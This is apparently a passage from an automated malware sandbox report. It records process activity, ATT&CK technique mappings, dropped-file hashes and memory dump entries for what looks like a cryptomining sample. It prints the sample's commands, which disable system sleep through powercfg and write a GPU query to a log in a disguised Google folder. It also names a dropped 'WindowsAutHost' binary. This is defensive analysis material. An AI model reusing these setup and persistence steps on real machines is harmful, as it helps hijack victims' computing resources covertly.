- Suspicious use of AdjustPrivilegeToken
PID:1652

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1976

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1992

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
1⤵
- Drops file in Program Files directory
PID:1648

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Libs\g.log
Filesize
198B

MD5
37dd19b2be4fa7635ad6a2f3238c4af1

SHA1
e5b2c034636b434faee84e82e3bce3a3d3561943

SHA256
8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

SHA512
86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

Download Submit
C:\Program Files\WindowsServices\WindowsAutHost
Filesize
9.4MB

MD5
5b8c8bddb55534c3c0dda7cb094eec00

SHA1
462827378d1f9aefe96f1a97ecde09d9e76f86d4

SHA256
124bf2342223005c220ddec47863dd8a27bdbc933a3793fcb6b6eccb202dafc9

SHA512
35c527544027860bcea50b41f7e002262d8a837040df68d050bbec1e9326765bf73f1c19b0724a69a4c6f3b37a2bea907079c695ddcb3c7f37d24625a599dd17

Download Submit
C:\Program Files\WindowsServices\WindowsAutHost
Filesize
9.4MB

MD5
5b8c8bddb55534c3c0dda7cb094eec00

SHA1
462827378d1f9aefe96f1a97ecde09d9e76f86d4

SHA256
124bf2342223005c220ddec47863dd8a27bdbc933a3793fcb6b6eccb202dafc9

SHA512
35c527544027860bcea50b41f7e002262d8a837040df68d050bbec1e9326765bf73f1c19b0724a69a4c6f3b37a2bea907079c695ddcb3c7f37d24625a599dd17

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
39dbf6f82ed1f6e545c7e6754488c55f

SHA1
75d13edcc0f064daafe165b82ab63e26ea8a5525

SHA256
e8b3cddbc9a5512c94b56d6ced6847960b1fa27501c0c6f54a8d615766377d7a

SHA512
913a577ab967531199cad52160c1c83ef16d06103e1e1cd06de553dc1f84b2c4750f46b95b87963ae6414fdfe5c57d77c196d368c1183fd9d1c74395c8adcea6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
39dbf6f82ed1f6e545c7e6754488c55f

SHA1
75d13edcc0f064daafe165b82ab63e26ea8a5525

SHA256
e8b3cddbc9a5512c94b56d6ced6847960b1fa27501c0c6f54a8d615766377d7a

SHA512
913a577ab967531199cad52160c1c83ef16d06103e1e1cd06de553dc1f84b2c4750f46b95b87963ae6414fdfe5c57d77c196d368c1183fd9d1c74395c8adcea6

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Program Files\WindowsServices\WindowsAutHost
Filesize
9.4MB

MD5
5b8c8bddb55534c3c0dda7cb094eec00

SHA1
462827378d1f9aefe96f1a97ecde09d9e76f86d4

SHA256
124bf2342223005c220ddec47863dd8a27bdbc933a3793fcb6b6eccb202dafc9

SHA512
35c527544027860bcea50b41f7e002262d8a837040df68d050bbec1e9326765bf73f1c19b0724a69a4c6f3b37a2bea907079c695ddcb3c7f37d24625a599dd17

Download Submit
memory/268-81-0x0000000000000000-mapping.dmp

Download
memory/436-118-0x0000000000000000-mapping.dmp

Download
memory/524-85-0x0000000000000000-mapping.dmp

Download
memory/560-80-0x0000000000000000-mapping.dmp

Download
memory/680-121-0x0000000000000000-mapping.dmp

Download
memory/808-135-0x0000000000000000-mapping.dmp

Download
memory/880-74-0x0000000000000000-mapping.dmp

Download
memory/904-69-0x0000000000000000-mapping.dmp

Download
memory/988-79-0x0000000000000000-mapping.dmp

Download
memory/1008-92-0x0000000000000000-mapping.dmp

Download
memory/1048-127-0x000007FEF35B0000-0x000007FEF3FD3000-memory.dmp

Filesize
10.1MB

Download
memory/1048-129-0x000007FEF2A50000-0x000007FEF35AD000-memory.dmp

Filesize
11.4MB

Download
memory/1048-134-0x0000000000D10000-0x0000000000D90000-memory.dmp

Filesize
512KB

Download
memory/1048-119-0x0000000000000000-mapping.dmp

Download
memory/1072-97-0x0000000000000000-mapping.dmp

Download
memory/1080-143-0x0000000000000000-mapping.dmp

Download
memory/1092-122-0x0000000000000000-mapping.dmp

Download
memory/1092-83-0x0000000000000000-mapping.dmp

Download
memory/1096-111-0x0000000000000000-mapping.dmp

Download
memory/1096-115-0x00000000011A4000-0x00000000011A7000-memory.dmp

Filesize
12KB

Download
memory/1096-113-0x000007FEF3F50000-0x000007FEF4973000-memory.dmp

Filesize
10.1MB

Download
memory/1096-114-0x000007FEF33F0000-0x000007FEF3F4D000-memory.dmp

Filesize
11.4MB

Download
memory/1096-116-0x00000000011AB000-0x00000000011CA000-memory.dmp

Filesize
124KB

Download
memory/1100-146-0x00000001407F25D0-mapping.dmp

Download
memory/1100-154-0x00000000008C0000-0x00000000008E0000-memory.dmp

Filesize
128KB

Download
memory/1100-147-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1100-156-0x00000000008C0000-0x00000000008E0000-memory.dmp

Filesize
128KB

Download
memory/1100-150-0x00000000002F0000-0x0000000000310000-memory.dmp

Filesize
128KB

Download
memory/1100-149-0x0000000000250000-0x0000000000270000-memory.dmp

Filesize
128KB

Download
memory/1100-151-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1100-152-0x00000000002F0000-0x0000000000310000-memory.dmp

Filesize
128KB

Download
memory/1100-155-0x00000000002F0000-0x0000000000310000-memory.dmp

Filesize
128KB

Download
memory/1100-153-0x00000000002F0000-0x0000000000310000-memory.dmp

Filesize
128KB

Download
memory/1132-87-0x0000000000000000-mapping.dmp

Download
memory/1136-139-0x0000000000000000-mapping.dmp

Download
memory/1212-65-0x0000000000000000-mapping.dmp

Download
memory/1288-68-0x0000000000000000-mapping.dmp

Download
memory/1292-117-0x0000000000000000-mapping.dmp

Download
memory/1292-71-0x0000000000000000-mapping.dmp

Download
memory/1364-66-0x0000000000000000-mapping.dmp

Download
memory/1400-72-0x0000000000000000-mapping.dmp

Download
memory/1472-137-0x0000000000000000-mapping.dmp

Download
memory/1504-130-0x0000000000000000-mapping.dmp

Download
memory/1580-141-0x0000000000000000-mapping.dmp

Download
memory/1588-132-0x0000000000000000-mapping.dmp

Download
memory/1624-77-0x0000000000000000-mapping.dmp

Download
memory/1628-120-0x0000000000000000-mapping.dmp

Download
memory/1640-54-0x000000013F020000-0x00000001400DE000-memory.dmp

Filesize
16.7MB

Download
memory/1640-94-0x000000013F020000-0x00000001400DE000-memory.dmp

Filesize
16.7MB

Download
memory/1640-57-0x000000013F020000-0x00000001400DE000-memory.dmp

Filesize
16.7MB

Download
memory/1644-89-0x00000000025FB000-0x000000000261A000-memory.dmp

Filesize
124KB

Download
memory/1644-88-0x00000000025F4000-0x00000000025F7000-memory.dmp

Filesize
12KB

Download
memory/1644-75-0x000007FEF3F50000-0x000007FEF4973000-memory.dmp

Filesize
10.1MB

Download
memory/1644-78-0x000007FEF33F0000-0x000007FEF3F4D000-memory.dmp

Filesize
11.4MB

Download
memory/1644-90-0x00000000025FB000-0x000000000261A000-memory.dmp

Filesize
124KB

Download
memory/1644-82-0x000000001B710000-0x000000001BA0F000-memory.dmp

Filesize
3.0MB

Download
memory/1644-67-0x0000000000000000-mapping.dmp

Download
memory/1648-142-0x0000000000000000-mapping.dmp

Download
memory/1652-131-0x0000000000000000-mapping.dmp

Download
memory/1660-140-0x00000001400014E0-mapping.dmp

Download
memory/1708-100-0x0000000000000000-mapping.dmp

Download
memory/1752-107-0x000000013F280000-0x000000014033E000-memory.dmp

Filesize
16.7MB

Download
memory/1752-148-0x000000013F280000-0x000000014033E000-memory.dmp

Filesize
16.7MB

Download
memory/1752-110-0x000000013F280000-0x000000014033E000-memory.dmp

Filesize
16.7MB

Download
memory/1752-104-0x0000000000000000-mapping.dmp

Download
memory/1752-144-0x000000013F280000-0x000000014033E000-memory.dmp

Filesize
16.7MB

Download
memory/1820-86-0x0000000000000000-mapping.dmp

Download
memory/1892-60-0x000007FEF35B0000-0x000007FEF3FD3000-memory.dmp

Filesize
10.1MB

Download
memory/1892-138-0x0000000000000000-mapping.dmp

Download
memory/1892-58-0x0000000000000000-mapping.dmp

Download
memory/1892-64-0x000000000297B000-0x000000000299A000-memory.dmp

Filesize
124KB

Download
memory/1892-63-0x0000000002974000-0x0000000002977000-memory.dmp

Filesize
12KB

Download
memory/1892-59-0x000007FEFB931000-0x000007FEFB933000-memory.dmp

Filesize
8KB

Download
memory/1892-62-0x0000000002974000-0x0000000002977000-memory.dmp

Filesize
12KB

Download
memory/1892-61-0x000007FEF2A50000-0x000007FEF35AD000-memory.dmp

Filesize
11.4MB

Download
memory/1900-96-0x000007FEF35B0000-0x000007FEF3FD3000-memory.dmp

Filesize
10.1MB

Download
memory/1900-91-0x0000000000000000-mapping.dmp

Download
memory/1900-101-0x0000000002474000-0x0000000002477000-memory.dmp

Filesize
12KB

Download
memory/1900-98-0x000007FEF2A50000-0x000007FEF35AD000-memory.dmp

Filesize
11.4MB

Download
memory/1900-99-0x000000001B860000-0x000000001BB5F000-memory.dmp

Filesize
3.0MB

Download
memory/1900-102-0x000000000247B000-0x000000000249A000-memory.dmp

Filesize
124KB

Download
memory/1976-128-0x0000000000000000-mapping.dmp

Download
memory/1980-76-0x0000000000000000-mapping.dmp

Download
memory/1992-84-0x0000000000000000-mapping.dmp

Download
memory/1992-125-0x0000000000000000-mapping.dmp

Download
memory/2012-126-0x0000000000000000-mapping.dmp

Download
memory/2016-133-0x0000000000000000-mapping.dmp

Download
memory/2024-136-0x0000000000000000-mapping.dmp

Download